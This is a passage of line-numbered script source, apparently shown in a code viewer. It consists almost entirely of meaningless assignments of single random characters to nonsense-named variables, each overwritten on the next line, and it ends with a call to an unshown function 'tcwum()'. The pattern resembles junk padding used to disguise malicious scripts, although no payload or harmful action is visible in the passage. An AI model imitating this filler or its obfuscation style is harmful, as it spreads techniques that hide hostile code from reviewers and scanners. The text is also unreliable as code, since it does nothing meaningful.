724 | tdkmtvnu = "W"; | |
725 | tdkmtvnu = "P"; | |
726 | tdkmtvnu = "a"; | |
727 | tdkmtvnu = "u"; | |
728 | tdkmtvnu = "q"; | |
729 | tdkmtvnu = "l"; | |
730 | tdkmtvnu = "f"; | |
731 | tdkmtvnu = "u"; | |
732 | tdkmtvnu = "l"; | |
733 | tdkmtvnu = "D"; | |
734 | tdkmtvnu = "m"; | |
735 | tdkmtvnu = "U"; | |
736 | tdkmtvnu = "y"; | |
737 | tdkmtvnu = "Q"; | |
738 | tdkmtvnu = "S"; | |
739 | tdkmtvnu = "S"; | |
740 | tdkmtvnu = "X"; | |
741 | tdkmtvnu = "y"; | |
742 | tdkmtvnu = "c"; | |
743 | nqrpvs = "g"; | |
744 | nqrpvs = "a"; | |
745 | nqrpvs = "d"; | |
746 | nqrpvs = "q"; | |
747 | nqrpvs = "H"; | |
748 | nqrpvs = "r"; | |
749 | nqrpvs = "S"; | |
750 | nqrpvs = "h"; | |
751 | nqrpvs = "r"; | |
752 | nqrpvs = "t"; | |
753 | nqrpvs = "u"; | |
754 | nqrpvs = "W"; | |
755 | nqrpvs = "h"; | |
756 | nqrpvs = "O"; | |
757 | nqrpvs = "A"; | |
758 | nqrpvs = "y"; | |
759 | nqrpvs = "k"; | |
760 | nqrpvs = "k"; | |
761 | nqrpvs = "h"; | |
762 | nqrpvs = "x"; | |
763 | nqrpvs = "G"; | |
764 | nqrpvs = "Y"; | |
765 | nqrpvs = "K"; | |
766 | nqrpvs = "H"; | |
767 | nqrpvs = "v"; | |
768 | nqrpvs = "F"; | |
769 | nqrpvs = "M"; | |
770 | nqrpvs = "F"; | |
771 | nqrpvs = "k"; | |
772 | nqrpvs = "B"; | |
773 | nqrpvs = "B"; | |
774 | nqrpvs = "H"; | |
775 | nqrpvs = "n"; | |
776 | nqrpvs = "i"; | |
777 | nqrpvs = "f"; | |
778 | nqrpvs = "m"; | |
779 | nqrpvs = "X"; | |
780 | nqrpvs = "u"; | |
781 | nqrpvs = "Q"; | |
782 | nqrpvs = "p"; | |
783 | nqrpvs = "c"; | |
784 | nqrpvs = "R"; | |
785 | nqrpvs = "W"; | |
786 | nqrpvs = "E"; | |
787 | urbswsj = "y"; | |
788 | urbswsj = "J"; | |
789 | urbswsj = "C"; | |
790 | urbswsj = "F"; | |
791 | urbswsj = "B"; | |
792 | urbswsj = "Z"; | |
793 | urbswsj = "b"; | |
794 | urbswsj = "h"; | |
795 | urbswsj = "q"; | |
796 | urbswsj = "D"; | |
797 | urbswsj = "j"; | |
798 | urbswsj = "c"; | |
799 | urbswsj = "k"; | |
800 | urbswsj = "D"; | |
801 | urbswsj = "Z"; | |
802 | urbswsj = "z"; | |
803 | urbswsj = "p"; | |
804 | urbswsj = "u"; | |
805 | urbswsj = "L"; | |
806 | urbswsj = "p"; | |
807 | urbswsj = "G"; | |
808 | urbswsj = "n"; | |
809 | urbswsj = "O"; | |
810 | uvyaofk = "c"; | |
811 | uvyaofk = "Y"; | |
812 | uvyaofk = "o"; | |
813 | uvyaofk = "J"; | |
814 | uvyaofk = "o"; | |
815 | uvyaofk = "t"; | |
816 | uvyaofk = "E"; | |
817 | uvyaofk = "K"; | |
818 | uvyaofk = "b"; | |
819 | uvyaofk = "w"; | |
820 | uvyaofk = "g"; | |
821 | uvyaofk = "n"; | |
822 | uvyaofk = "a"; | |
823 | uvyaofk = "w"; | |
824 | uvyaofk = "M"; | |
825 | uvyaofk = "A"; | |
826 | uvyaofk = "A"; | |
827 | uvyaofk = "O"; | |
828 | uvyaofk = "K"; | |
829 | uvyaofk = "o"; | |
830 | uvyaofk = "q"; | |
831 | uvyaofk = "W"; | |
832 | uvyaofk = "d"; | |
833 | uvyaofk = "m"; | |
834 | uvyaofk = "b"; | |
835 | uvyaofk = "p"; | |
836 | uvyaofk = "t"; | |
837 | uvyaofk = "g"; | |
838 | uvyaofk = "p"; | |
839 | uvyaofk = "e"; | |
840 | uvyaofk = "p"; | |
841 | uvyaofk = "v"; | |
842 | uvyaofk = "D"; | |
843 | uvyaofk = "D"; | |
844 | uvyaofk = "V"; | |
845 | uvyaofk = "P"; | |
846 | uvyaofk = "Q"; | |
847 | uvyaofk = "O"; | |
848 | uvyaofk = "x"; | |
849 | uvyaofk = "A"; | |
850 | uvyaofk = " "; | |
851 | euxsck = "H"; | |
852 | euxsck = "k"; | |
853 | euxsck = "U"; | |
854 | euxsck = "B"; | |
855 | euxsck = "G"; | |
856 | euxsck = "D"; | |
857 | euxsck = "x"; | |
858 | euxsck = "u"; | |
859 | dslibftd = "a"; | |
860 | dslibftd = "I"; | |
861 | dslibftd = "d"; | |
862 | dslibftd = "r"; | |
863 | dslibftd = "o"; | |
864 | dslibftd = "e"; | |
865 | dslibftd = "y"; | |
866 | dslibftd = "M"; | |
867 | dslibftd = "x"; | |
868 | dslibftd = "Y"; | |
869 | tgydr = "x"; | |
870 | tgydr = "D"; | |
871 | tgydr = "j"; | |
872 | tgydr = "w"; | |
873 | tgydr = "c"; | |
874 | tgydr = "o"; | |
875 | tgydr = "P"; | |
876 | tgydr = "g"; | |
877 | tgydr = "s"; | |
878 | tgydr = "O"; | |
879 | tgydr = "g"; | |
880 | tgydr = "F"; | |
881 | tgydr = "M"; | |
882 | tgydr = "A"; | |
883 | tgydr = "X"; | |
884 | tgydr = "K"; | |
885 | tgydr = "l"; | |
886 | tgydr = "I"; | |
887 | tgydr = "p"; | |
888 | tgydr = "A"; | |
889 | tgydr = "z"; | |
890 | tgydr = "g"; | |
891 | tgydr = "g"; | |
892 | tgydr = "S"; | |
893 | tgydr = "M"; | |
894 | tgydr = "z"; | |
895 | tgydr = "b"; | |
896 | tgydr = "M"; | |
897 | tgydr = "P"; | |
898 | tgydr = "N"; | |
899 | tgydr = "p"; | |
900 | tgydr = "P"; | |
901 | tgydr = "e"; | |
902 | tgydr = "z"; | |
903 | tgydr = "K"; | |
904 | tgydr = "g"; | |
905 | tgydr = "X"; | |
906 | tgydr = "o"; | |
907 | tgydr = "V"; | |
908 | tgydr = "W"; | |
909 | tgydr = "i"; | |
910 | tgydr = "f"; | |
911 | tgydr = "5"; | |
912 | scitxx = "U"; | |
913 | wsjqj = "Z"; | |
914 | wsjqj = "P"; | |
915 | wsjqj = "e"; | |
916 | wsjqj = "N"; | |
917 | wsjqj = "I"; | |
918 | wsjqj = "T"; | |
919 | wsjqj = "i"; | |
920 | wsjqj = "b"; | |
921 | wsjqj = "r"; | |
922 | wsjqj = "d"; | |
923 | wsjqj = "H"; | |
924 | wsjqj = "h"; | |
925 | wsjqj = "A"; | |
926 | wsjqj = "k"; | |
927 | wsjqj = "A"; | |
928 | wsjqj = "P"; | |
929 | wsjqj = "D"; | |
930 | wsjqj = "I"; | |
931 | wsjqj = "k"; | |
932 | wsjqj = "X"; | |
933 | wsjqj = "a"; | |
934 | wsjqj = "u"; | |
935 | wsjqj = "l"; | |
936 | wsjqj = "G"; | |
937 | wsjqj = "L"; | |
938 | wsjqj = "y"; | |
939 | wsjqj = "Z"; | |
940 | wsjqj = "b"; | |
941 | wsjqj = "p"; | |
942 | wsjqj = "Y"; | |
943 | wsjqj = "i"; | |
944 | wsjqj = "k"; | |
945 | wsjqj = "g"; | |
946 | wsjqj = "m"; | |
947 | wsjqj = "Z"; | |
948 | wsjqj = "E"; | |
949 | wsjqj = "F"; | |
950 | wsjqj = "z"; | |
951 | wsjqj = "2"; | |
952 | moggbzpa = "B"; | |
953 | moggbzpa = "m"; | |
954 | moggbzpa = "P"; | |
955 | moggbzpa = "V"; | |
956 | moggbzpa = "V"; | |
957 | moggbzpa = "K"; | |
958 | moggbzpa = "o"; | |
959 | moggbzpa = "x"; | |
960 | moggbzpa = "V"; | |
961 | moggbzpa = "u"; | |
962 | moggbzpa = "t"; | |
963 | moggbzpa = "D"; | |
964 | moggbzpa = "y"; | |
965 | moggbzpa = "d"; | |
966 | moggbzpa = "J"; | |
967 | moggbzpa = "q"; | |
968 | moggbzpa = "N"; | |
969 | moggbzpa = "G"; | |
970 | moggbzpa = "H"; | |
971 | moggbzpa = "v"; | |
972 | uvmpkuc = "w"; | |
973 | uvmpkuc = "Q"; | |
974 | uvmpkuc = "S"; | |
975 | uvmpkuc = "w"; | |
976 | uvmpkuc = "F"; | |
977 | uvmpkuc = "X"; | |
978 | uvmpkuc = "D"; | |
979 | uvmpkuc = "P"; | |
980 | uvmpkuc = "S"; | |
981 | uvmpkuc = "D"; | |
982 | uvmpkuc = "X"; | |
983 | uvmpkuc = "M"; | |
984 | uvmpkuc = "g"; | |
985 | uvmpkuc = "a"; | |
986 | uvmpkuc = "z"; | |
987 | uvmpkuc = "q"; | |
988 | uvmpkuc = "v"; | |
989 | uvmpkuc = "f"; | |
990 | uvmpkuc = "o"; | |
991 | uvmpkuc = "r"; | |
992 | uvmpkuc = "n"; | |
993 | uvmpkuc = "o"; | |
994 | uvmpkuc = "E"; | |
995 | uvmpkuc = "H"; | |
996 | uvmpkuc = "w"; | |
997 | uvmpkuc = "f"; | |
998 | uvmpkuc = "U"; | |
999 | uvmpkuc = "p"; | |
1000 | uvmpkuc = "f"; | |
1001 | ebeochxxp = "E"; | |
1002 | ebeochxxp = "i"; | |
1003 | ebeochxxp = "M"; | |
1004 | ebeochxxp = "Y"; | |
1005 | ebeochxxp = "G"; | |
1006 | ebeochxxp = "R"; | |
1007 | ebeochxxp = "t"; | |
1008 | ebeochxxp = "W"; | |
1009 | ebeochxxp = "v"; | |
1010 | ebeochxxp = "h"; | |
1011 | ebeochxxp = "K"; | |
1012 | ebeochxxp = "R"; | |
1013 | ebeochxxp = "W"; | |
1014 | ebeochxxp = "u"; | |
1015 | ebeochxxp = "H"; | |
1016 | ebeochxxp = "Z"; | |
1017 | ebeochxxp = "R"; | |
1018 | ebeochxxp = "n"; | |
1019 | ebeochxxp = "d"; | |
1020 | ebeochxxp = "W"; | |
1021 | ebeochxxp = "I"; | |
1022 | ebeochxxp = "c"; | |
1023 | ebeochxxp = "B"; | |
1024 | ebeochxxp = "S"; | |
1025 | ebeochxxp = "d"; | |
1026 | ebeochxxp = "H"; | |
1027 | ebeochxxp = "O"; | |
1028 | ebeochxxp = "4"; | |
1029 | yhsqm = "i"; | |
1030 | yhsqm = "t"; | |
1031 | yhsqm = "J"; | |
1032 | yhsqm = "x"; | |
1033 | yhsqm = "Z"; | |
1034 | yhsqm = "k"; | |
1035 | yhsqm = "V"; | |
1036 | yhsqm = "S"; | |
1037 | yhsqm = "b"; | |
1038 | yhsqm = "z"; | |
1039 | yhsqm = "O"; | |
1040 | yhsqm = "P"; | |
1041 | yhsqm = "B"; | |
1042 | yhsqm = "l"; | |
1043 | yhsqm = "P"; | |
1044 | yhsqm = "X"; | |
1045 | yhsqm = "y"; | |
1046 | yhsqm = "z"; | |
1047 | yhsqm = "r"; | |
1048 | qxophnueq = "V"; | |
1049 | qxophnueq = "O"; | |
1050 | qxophnueq = "a"; | |
1051 | qxophnueq = "C"; | |
1052 | qxophnueq = "s"; | |
1053 | qxophnueq = "V"; | |
1054 | qxophnueq = "W"; | |
1055 | qxophnueq = "G"; | |
1056 | qxophnueq = "g"; | |
1057 | qxophnueq = "W"; | |
1058 | qxophnueq = "B"; | |
1059 | qxophnueq = "s"; | |
1060 | qxophnueq = "x"; | |
1061 | qxophnueq = "g"; | |
1062 | qxophnueq = "n"; | |
1063 | qxophnueq = "W"; | |
1064 | qxophnueq = "O"; | |
1065 | qxophnueq = "r"; | |
1066 | qxophnueq = "g"; | |
1067 | qxophnueq = "y"; | |
1068 | qxophnueq = "k"; | |
1069 | qxophnueq = "a"; | |
1070 | qxophnueq = "R"; | |
1071 | qxophnueq = "o"; | |
1072 | qxophnueq = "w"; | |
1073 | qxophnueq = "H"; | |
1074 | qxophnueq = "W"; | |
1075 | qxophnueq = "Z"; | |
1076 | qxophnueq = "i"; | |
1077 | qxophnueq = "t"; | |
1078 | qxophnueq = "R"; | |
1079 | qxophnueq = "G"; | |
1080 | qxophnueq = "i"; | |
1081 | qxophnueq = "A"; | |
1082 | qxophnueq = "b"; | |
1083 | qxophnueq = "i"; | |
1084 | qxophnueq = "N"; | |
1085 | qfqaefol = "s"; | |
1086 | qfqaefol = "c"; | |
1087 | qfqaefol = "u"; | |
1088 | qfqaefol = "o"; | |
1089 | qfqaefol = "b"; | |
1090 | qfqaefol = "Y"; | |
1091 | qfqaefol = "r"; | |
1092 | qfqaefol = "C"; | |
1093 | qfqaefol = "R"; | |
1094 | qfqaefol = "m"; | |
1095 | qfqaefol = "v"; | |
1096 | qfqaefol = "s"; | |
1097 | qfqaefol = "w"; | |
1098 | qfqaefol = "y"; | |
1099 | qfqaefol = "e"; | |
1100 | qfqaefol = "k"; | |
1101 | ankvk = "F"; | |
1102 | ankvk = "J"; | |
1103 | ankvk = "K"; | |
1104 | ankvk = "f"; | |
1105 | ankvk = "U"; | |
1106 | ankvk = "i"; | |
1107 | ankvk = "s"; | |
1108 | ankvk = "d"; | |
1109 | ankvk = "V"; | |
1110 | ankvk = "F"; | |
1111 | ankvk = "n"; | |
1112 | ankvk = "M"; | |
1113 | ankvk = "e"; | |
1114 | ankvk = "b"; | |
1115 | ankvk = "h"; | |
1116 | ankvk = "a"; | |
1117 | ankvk = "u"; | |
1118 | ankvk = "H"; | |
1119 | ymlclrm = "K"; | |
1120 | ymlclrm = "Y"; | |
1121 | ymlclrm = "E"; | |
1122 | ymlclrm = "E"; | |
1123 | ymlclrm = "W"; | |
1124 | ymlclrm = "O"; | |
1125 | ymlclrm = "s"; | |
1126 | ymlclrm = "E"; | |
1127 | ymlclrm = "Q"; | |
1128 | ymlclrm = "C"; | |
1129 | ymlclrm = "T"; | |
1130 | ymlclrm = "G"; | |
1131 | ymlclrm = "G"; | |
1132 | ymlclrm = "k"; | |
1133 | ymlclrm = "f"; | |
1134 | ymlclrm = "E"; | |
1135 | ymlclrm = "B"; | |
1136 | ymlclrm = "t"; | |
1137 | ymlclrm = "u"; | |
1138 | ymlclrm = "g"; | |
1139 | ymlclrm = "q"; | |
1140 | ymlclrm = "L"; | |
1141 | ymlclrm = "Q"; | |
1142 | ymlclrm = "0"; | |
1143 | bluorlqjp = "W"; | |
1144 | bluorlqjp = "J"; | |
1145 | bluorlqjp = "q"; | |
1146 | bluorlqjp = "j"; | |
1147 | bluorlqjp = "v"; | |
1148 | bluorlqjp = "r"; | |
1149 | bluorlqjp = "R"; | |
1150 | bluorlqjp = "G"; | |
1151 | bluorlqjp = "o"; | |
1152 | bluorlqjp = "Q"; | |
1153 | bluorlqjp = "G"; | |
1154 | bluorlqjp = "m"; | |
1155 | bluorlqjp = "R"; | |
1156 | bluorlqjp = "H"; | |
1157 | bluorlqjp = "p"; | |
1158 | nzfze = "P"; | |
1159 | nzfze = "z"; | |
1160 | nzfze = "V"; | |
1161 | nzfze = "q"; | |
1162 | nzfze = "X"; | |
1163 | nzfze = "G"; | |
1164 | nzfze = "R"; | |
1165 | nzfze = "p"; | |
1166 | nzfze = "Z"; | |
1167 | nzfze = "E"; | |
1168 | nzfze = "f"; | |
1169 | nzfze = "j"; | |
1170 | nzfze = "H"; | |
1171 | nzfze = "j"; | |
1172 | nzfze = "L"; | |
1173 | nzfze = "v"; | |
1174 | nzfze = "F"; | |
1175 | nzfze = "j"; | |
1176 | nzfze = "U"; | |
1177 | nzfze = "S"; | |
1178 | nzfze = "c"; | |
1179 | nzfze = "e"; | |
1180 | nzfze = "Y"; | |
1181 | nzfze = "V"; | |
1182 | nzfze = "e"; | |
1183 | nzfze = "C"; | |
1184 | nzfze = "H"; | |
1185 | nzfze = "z"; | |
1186 | nzfze = "W"; | |
1187 | nzfze = "b"; | |
1188 | nzfze = "m"; | |
1189 | nzfze = "G"; | |
1190 | nzfze = "U"; | |
1191 | nzfze = "T"; | |
1192 | nzfze = "p"; | |
1193 | nzfze = "r"; | |
1194 | nzfze = "H"; | |
1195 | nzfze = "M"; | |
1196 | nzfze = "Y"; | |
1197 | nzfze = "A"; | |
1198 | nzfze = "l"; | |
1199 | nzfze = "u"; | |
1200 | nzfze = "s"; | |
1201 | nzfze = "F"; | |
1202 | lpjzqlrfg = "Y"; | |
1203 | lpjzqlrfg = "T"; | |
1204 | lpjzqlrfg = "u"; | |
1205 | lpjzqlrfg = "w"; | |
1206 | lpjzqlrfg = "m"; | |
1207 | lpjzqlrfg = "S"; | |
1208 | lpjzqlrfg = "N"; | |
1209 | lpjzqlrfg = "H"; | |
1210 | lpjzqlrfg = "o"; | |
1211 | lpjzqlrfg = "G"; | |
1212 | lpjzqlrfg = "M"; | |
1213 | lpjzqlrfg = "c"; | |
1214 | lpjzqlrfg = "h"; | |
1215 | lpjzqlrfg = "I"; | |
1216 | lpjzqlrfg = "q"; | |
1217 | lpjzqlrfg = "e"; | |
1218 | lpjzqlrfg = "m"; | |
1219 | lpjzqlrfg = "o"; | |
1220 | lpjzqlrfg = "S"; | |
1221 | lpjzqlrfg = "c"; | |
1222 | lpjzqlrfg = "n"; | |
1223 | lpjzqlrfg = "K"; | |
1224 | lpjzqlrfg = "h"; | |
1225 | lpjzqlrfg = "d"; | |
1226 | lpjzqlrfg = "j"; | |
1227 | lpjzqlrfg = "F"; | |
1228 | lpjzqlrfg = "P"; | |
1229 | lpjzqlrfg = "O"; | |
1230 | lpjzqlrfg = "t"; | |
1231 | lpjzqlrfg = "Y"; | |
1232 | lpjzqlrfg = "q"; | |
1233 | lpjzqlrfg = "I"; | |
1234 | lpjzqlrfg = "c"; | |
1235 | lpjzqlrfg = "v"; | |
1236 | lpjzqlrfg = "R"; | |
1237 | lpjzqlrfg = "."; | |
1238 | pnkdy = "l"; | |
1239 | pnkdy = "z"; | |
1240 | pnkdy = "Y"; | |
1241 | pnkdy = "t"; | |
1242 | pnkdy = "j"; | |
1243 | pnkdy = "d"; | |
1244 | pnkdy = "a"; | |
1245 | pnkdy = "r"; | |
1246 | pnkdy = "Y"; | |
1247 | pnkdy = "Y"; | |
1248 | pnkdy = "M"; | |
1249 | pnkdy = "J"; | |
1250 | pnkdy = "q"; | |
1251 | pnkdy = "l"; | |
1252 | pnkdy = "m"; | |
1253 | pnkdy = "L"; | |
1254 | pcjgu = "R"; | |
1255 | pcjgu = "z"; | |
1256 | pcjgu = "o"; | |
1257 | bqyju = "h"; | |
1258 | bqyju = "s"; | |
1259 | bqyju = "z"; | |
1260 | bqyju = "h"; | |
1261 | bqyju = "D"; | |
1262 | bqyju = "k"; | |
1263 | bqyju = "r"; | |
1264 | bqyju = "O"; | |
1265 | bqyju = "t"; | |
1266 | bqyju = "k"; | |
1267 | bqyju = "V"; | |
1268 | bqyju = "f"; | |
1269 | bqyju = "R"; | |
1270 | bqyju = "J"; | |
1271 | bqyju = "B"; | |
1272 | bqyju = "E"; | |
1273 | bqyju = "T"; | |
1274 | bqyju = "P"; | |
1275 | bqyju = "c"; | |
1276 | bqyju = "e"; | |
1277 | bqyju = "Q"; | |
1278 | bqyju = "L"; | |
1279 | bqyju = "i"; | |
1280 | bqyju = "w"; | |
1281 | bqyju = "G"; | |
1282 | bqyju = "I"; | |
1283 | bqyju = "F"; | |
1284 | bqyju = "Q"; | |
1285 | bqyju = "b"; | |
1286 | bqyju = "d"; | |
1287 | ixxwm = "K"; | |
1288 | ixxwm = "F"; | |
1289 | ixxwm = "E"; | |
1290 | ixxwm = "s"; | |
1291 | ixxwm = "d"; | |
1292 | ixxwm = "I"; | |
1293 | ixxwm = "m"; | |
1294 | ixxwm = "x"; | |
1295 | ixxwm = "M"; | |
1296 | ixxwm = "U"; | |
1297 | ixxwm = "n"; | |
1298 | ixxwm = "M"; | |
1299 | ixxwm = "H"; | |
1300 | ixxwm = "v"; | |
1301 | ixxwm = "U"; | |
1302 | ixxwm = "c"; | |
1303 | ixxwm = "V"; | |
1304 | ixxwm = "T"; | |
1305 | ixxwm = "r"; | |
1306 | ixxwm = "z"; | |
1307 | ixxwm = "r"; | |
1308 | ixxwm = "F"; | |
1309 | ixxwm = "i"; | |
1310 | ixxwm = "T"; | |
1311 | ixxwm = "K"; | |
1312 | ixxwm = "K"; | |
1313 | heqpuupj = "q"; | |
1314 | heqpuupj = "p"; | |
1315 | heqpuupj = "S"; | |
1316 | heqpuupj = "V"; | |
1317 | heqpuupj = "6"; | |
1318 | esbhj = "b"; | |
1319 | esbhj = "O"; | |
1320 | esbhj = "P"; | |
1321 | esbhj = "G"; | |
1322 | esbhj = "f"; | |
1323 | esbhj = "a"; | |
1324 | esbhj = "k"; | |
1325 | esbhj = "s"; | |
1326 | esbhj = "r"; | |
1327 | esbhj = "g"; | |
1328 | esbhj = "T"; | |
1329 | esbhj = "e"; | |
1330 | esbhj = "R"; | |
1331 | esbhj = "I"; | |
1332 | esbhj = "G"; | |
1333 | esbhj = "J"; | |
1334 | esbhj = "m"; | |
1335 | esbhj = "I"; | |
1336 | esbhj = "l"; | |
1337 | esbhj = "&"; | |
1338 | oivwkh = "i"; | |
1339 | oivwkh = "m"; | |
1340 | oivwkh = "k"; | |
1341 | oivwkh = "d"; | |
1342 | oivwkh = "k"; | |
1343 | oivwkh = "m"; | |
1344 | oivwkh = "u"; | |
1345 | oivwkh = "s"; | |
1346 | oivwkh = "U"; | |
1347 | oivwkh = "o"; | |
1348 | oivwkh = "O"; | |
1349 | oivwkh = "M"; | |
1350 | oivwkh = "q"; | |
1351 | oivwkh = "B"; | |
1352 | oivwkh = "l"; | |
1353 | oivwkh = "z"; | |
1354 | oivwkh = "G"; | |
1355 | oivwkh = "b"; | |
1356 | oivwkh = "k"; | |
1357 | oivwkh = "m"; | |
1358 | tlgzqr = "N"; | |
1359 | tlgzqr = "Q"; | |
1360 | tlgzqr = "L"; | |
1361 | tlgzqr = "D"; | |
1362 | tlgzqr = "i"; | |
1363 | tlgzqr = "c"; | |
1364 | tlgzqr = "P"; | |
1365 | tlgzqr = "Y"; | |
1366 | tlgzqr = "U"; | |
1367 | tlgzqr = "f"; | |
1368 | tlgzqr = "I"; | |
1369 | tlgzqr = "Z"; | |
1370 | tlgzqr = "P"; | |
1371 | tlgzqr = "I"; | |
1372 | tlgzqr = "f"; | |
1373 | tlgzqr = "u"; | |
1374 | tlgzqr = "o"; | |
1375 | tlgzqr = "F"; | |
1376 | tlgzqr = "l"; | |
1377 | tlgzqr = "t"; | |
1378 | tlgzqr = "s"; | |
1379 | tlgzqr = "C"; | |
1380 | tlgzqr = "F"; | |
1381 | tlgzqr = "s"; | |
1382 | tlgzqr = "V"; | |
1383 | tlgzqr = "q"; | |
1384 | tlgzqr = "G"; | |
1385 | tlgzqr = "Y"; | |
1386 | tlgzqr = "F"; | |
1387 | tlgzqr = "w"; | |
1388 | tlgzqr = "N"; | |
1389 | tlgzqr = "f"; | |
1390 | tlgzqr = "G"; | |
1391 | tlgzqr = "H"; | |
1392 | tlgzqr = "U"; | |
1393 | tlgzqr = "Z"; | |
1394 | tlgzqr = "V"; | |
1395 | tlgzqr = "a"; | |
1396 | tlgzqr = "t"; | |
1397 | tlgzqr = "D"; | |
1398 | tlgzqr = "Q"; | |
1399 | tlgzqr = "n"; | |
1400 | tlgzqr = "M"; | |
1401 | tlgzqr = "\""; | |
1402 | qnokgvb = "f"; | |
1403 | qnokgvb = "J"; | |
1404 | qnokgvb = "m"; | |
1405 | qnokgvb = "W"; | |
1406 | qnokgvb = "Q"; | |
1407 | qnokgvb = "A"; | |
1408 | qnokgvb = "O"; | |
1409 | qnokgvb = "w"; | |
1410 | qnokgvb = "H"; | |
1411 | qnokgvb = "b"; | |
1412 | qnokgvb = "j"; | |
1413 | qnokgvb = "Z"; | |
1414 | qnokgvb = "P"; | |
1415 | qnokgvb = "f"; | |
1416 | qnokgvb = "W"; | |
1417 | qnokgvb = "S"; | |
1418 | qnokgvb = "r"; | |
1419 | qnokgvb = "B"; | |
1420 | qnokgvb = "R"; | |
1421 | qnokgvb = "a"; | |
1422 | qnokgvb = "A"; | |
1423 | qnokgvb = "H"; | |
1424 | qnokgvb = "b"; | |
1425 | qnokgvb = "S"; | |
1426 | qnokgvb = "c"; | |
1427 | qnokgvb = "f"; | |
1428 | qnokgvb = "y"; | |
1429 | qnokgvb = "c"; | |
1430 | qnokgvb = "s"; | |
1431 | qnokgvb = "O"; | |
1432 | qnokgvb = "S"; | |
1433 | qnokgvb = "p"; | |
1434 | qnokgvb = "t"; | |
1435 | qnokgvb = "y"; | |
1436 | qnokgvb = "l"; | |
1437 | qnokgvb = "c"; | |
1438 | qnokgvb = "G"; | |
1439 | qnokgvb = "C"; | |
1440 | qnokgvb = "x"; | |
1441 | etefbq = "h"; | |
1442 | etefbq = "j"; | |
1443 | etefbq = "X"; | |
1444 | etefbq = "R"; | |
1445 | etefbq = "R"; | |
1446 | etefbq = "O"; | |
1447 | etefbq = "k"; | |
1448 | etefbq = "w"; | |
1449 | etefbq = "b"; | |
1450 | etefbq = "G"; | |
1451 | etefbq = "Q"; | |
1452 | etefbq = "V"; | |
1453 | etefbq = "s"; | |
1454 | etefbq = "U"; | |
1455 | etefbq = "j"; | |
1456 | etefbq = "q"; | |
1457 | etefbq = "G"; | |
1458 | etefbq = "M"; | |
1459 | etefbq = "Q"; | |
1460 | etefbq = "e"; | |
1461 | etefbq = "v"; | |
1462 | etefbq = "l"; | |
1463 | etefbq = "M"; | |
1464 | etefbq = "W"; | |
1465 | auvfgcj = "k"; | |
1466 | auvfgcj = "l"; | |
1467 | auvfgcj = "p"; | |
1468 | auvfgcj = "o"; | |
1469 | auvfgcj = "B"; | |
1470 | auvfgcj = "p"; | |
1471 | auvfgcj = "f"; | |
1472 | auvfgcj = "Q"; | |
1473 | auvfgcj = "t"; | |
1474 | auvfgcj = "U"; | |
1475 | auvfgcj = "R"; | |
1476 | auvfgcj = "I"; | |
1477 | auvfgcj = "w"; | |
1478 | auvfgcj = "J"; | |
1479 | auvfgcj = "s"; | |
1480 | auvfgcj = "z"; | |
1481 | auvfgcj = "m"; | |
1482 | auvfgcj = "r"; | |
1483 | auvfgcj = "J"; | |
1484 | auvfgcj = "z"; | |
1485 | auvfgcj = "J"; | |
1486 | auvfgcj = "k"; | |
1487 | auvfgcj = "W"; | |
1488 | auvfgcj = "B"; | |
1489 | auvfgcj = "J"; | |
1490 | auvfgcj = "i"; | |
1491 | auvfgcj = "U"; | |
1492 | auvfgcj = "Y"; | |
1493 | auvfgcj = "F"; | |
1494 | auvfgcj = "W"; | |
1495 | auvfgcj = "t"; | |
1496 | auvfgcj = "U"; | |
1497 | auvfgcj = "F"; | |
1498 | auvfgcj = "w"; | |
1499 | auvfgcj = "y"; | |
1500 | auvfgcj = "v"; | |
1501 | auvfgcj = "i"; | |
1502 | auvfgcj = "F"; | |
1503 | auvfgcj = "f"; | |
1504 | auvfgcj = "Q"; | |
1505 | auvfgcj = "q"; | |
1506 | eyuoikhm = "n"; | |
1507 | eyuoikhm = "T"; | |
1508 | eyuoikhm = "d"; | |
1509 | eyuoikhm = "e"; | |
1510 | eyuoikhm = "g"; | |
1511 | tcwum ( ); |
|